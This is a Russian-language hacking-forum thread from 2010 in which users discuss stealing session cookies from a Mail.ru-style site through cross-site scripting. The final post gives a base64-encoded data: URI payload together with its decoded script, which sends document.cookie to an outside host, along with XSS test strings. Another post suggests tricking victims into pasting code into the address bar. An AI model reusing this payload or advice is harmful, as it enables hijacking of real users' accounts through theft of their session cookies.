HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 09.03.2010, 18:37
tracy
Познающий
Регистрация: 24.03.2009
Сообщений: 54
С нами: 9017758

Репутация: 13
По умолчанию

Ты видимо не правильный запрос вписал
 
Ответить с цитированием

  #2  
Старый 09.03.2010, 18:27
Alk@sh
Новичок
Регистрация: 05.07.2009
Сообщений: 29
С нами: 8869322

Репутация: 18
По умолчанию

самое главное тебе надо найти xss
 
Ответить с цитированием

  #3  
Старый 09.03.2010, 18:28
гаррет-тень
Познающий
Регистрация: 21.12.2009
Сообщений: 34
С нами: 8625696

Репутация: 1
По умолчанию

я мейловские куки глянул, они большие, да и видео когда смотрел там большие
 
Ответить с цитированием

  #4  
Старый 09.03.2010, 18:31
гаррет-тень
Познающий
Регистрация: 21.12.2009
Сообщений: 34
С нами: 8625696

Репутация: 1
По умолчанию

точнее так можно)
 
Ответить с цитированием

  #5  
Старый 09.03.2010, 18:47
гаррет-тень
Познающий
Регистрация: 21.12.2009
Сообщений: 34
С нами: 8625696

Репутация: 1
По умолчанию

а как по правильно? открой тайну)
 
Ответить с цитированием

  #6  
Старый 09.03.2010, 18:50
гаррет-тень
Познающий
Регистрация: 21.12.2009
Сообщений: 34
С нами: 8625696

Репутация: 1
По умолчанию

в setcookie данные передаются из формы... имеешь в виду чем длиннее введенные данные в форме тем длиннее куки?)
 
Ответить с цитированием

  #7  
Старый 09.03.2010, 18:58
warlok
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
С нами: 9594385

Репутация: 386
По умолчанию

Цитата:
в setcookie данные передаются из формы... имеешь в виду чем длиннее введенные данные в форме тем длиннее куки?)
Неважно с откуда они передаются, я о том это зависит от программиста который сам решает что ему писать в кукисы. Я уж незнаю есть ли там у тебя xss или нет если всеже нет то то заставь вставить твой код в адресную строку при открытой странице.
 
Ответить с цитированием

  #8  
Старый 10.03.2010, 07:40
гаррет-тень
Познающий
Регистрация: 21.12.2009
Сообщений: 34
С нами: 8625696

Репутация: 1
По умолчанию

то есть сначало нужно найти xss, а потом отправлять) спс)
 
Ответить с цитированием

  #9  
Старый 10.03.2010, 15:16
гаррет-тень
Познающий
Регистрация: 21.12.2009
Сообщений: 34
С нами: 8625696

Репутация: 1
По умолчанию

и все-таки не догоняю...
 
Ответить с цитированием

  #10  
Старый 10.03.2010, 15:20
гаррет-тень
Познающий
Регистрация: 21.12.2009
Сообщений: 34
С нами: 8625696

Репутация: 1
По умолчанию

вот например такое проходит PHNjcmlwdD4NCmFsZXJ0KFhTUykNCjwvc2NyaXB0Pg== что равно <script>alert(XSS)</script>. а data:text/html;base64,PHNjcmlwdD4NCmltZyA9IG5ldyBJbWFnZSgpOy BpbWcuc3JjID0gImh0dHA6Ly9odHRwei5ydS9u
cGhpcjhseG0xeS5naWY/Iitkb2N1bWVudC5jb29raWU7DQo8L3NjcmlwdD4= что значит <script>
img = new Image(); img.src = "http://httpz.ru/nphir8lxm1y.gif?"+document.cookie;
</script>
не проходит( ведь если проходит "><script>alert()</script> значит уязвимость есть, следовательно и куки должны вороваться
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ввожу краденные куки в Mail и нифига!!! почему так? Dr..VATSON Болталка 21 11.01.2010 09:14



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.